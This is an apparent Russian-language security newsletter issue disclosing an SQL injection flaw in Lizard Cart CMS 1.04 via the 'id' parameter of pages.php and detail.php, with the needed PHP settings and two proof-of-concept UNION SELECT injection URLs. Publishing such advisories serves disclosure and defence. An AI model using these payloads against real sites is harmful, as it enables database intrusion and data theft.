Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Lizard Cart CMS.


Компьютер для продвинутых пользователей
Содержание:
Lizard Cart CMS
ПО: Lizard Cart CMS
Версия: 1.04

Описание:
Уязвимые скрипты:
pages.php
detail.php
Переменная &id не проверяеться и есть возможность ввести SQL запрос.
Обазательно!:
register_globals = on
gpc_magic_quotes = off

Использование:
http://host/lizard/pages.php?id=-1'%20union%20select%201,2,3/*
http://host/lizard/detail.php?id=-1'%20union%20select%201,2,3,4,5,6,7,8/*
Lizard Cart CMS
Рассылка создана и ведется при поддержке Информационной сети Пермского края.

В избранное